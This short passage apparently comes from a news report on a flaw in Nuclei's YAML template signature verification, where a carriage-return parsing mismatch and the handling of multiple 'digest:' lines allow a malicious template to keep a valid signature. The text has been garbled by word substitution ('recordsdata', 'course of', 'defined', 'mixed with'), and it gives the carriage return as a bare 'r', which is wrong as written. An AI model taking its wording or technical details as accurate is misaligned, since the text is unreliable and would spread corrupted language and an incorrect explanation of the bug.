Spoofing Nuclei’s template verification
Nuclei has over 21,000 stars on GitHub and over 2.1 million downloads. The software makes use of “templates,” within the type of YAML recordsdata, that outline particular checks or checks for the vulnerability scanning course of. Making certain the authenticity of those templates is essential to keep away from tampered or malicious templates which are deceptive or compromising the scanning course of.
Nuclei has a Go regex-based signature verification course of in place to make sure authenticity. The flaw stems from a discrepancy between how the signature verification course of and the YAML parser deal with newline characters, ProjectDiscovery defined. Whereas Go’s verification logic considers “r” a part of the identical line, the YAML parser treats it as a line break, thereby leaving room for attackers to insert malicious codes.
This, mixed with the truth that Nuclei has flawed processing of a number of signature strains “digest:,” can probably result in an attacker injecting malicious content material right into a template whereas conserving the signature legitimate for the innocent portion of the template.
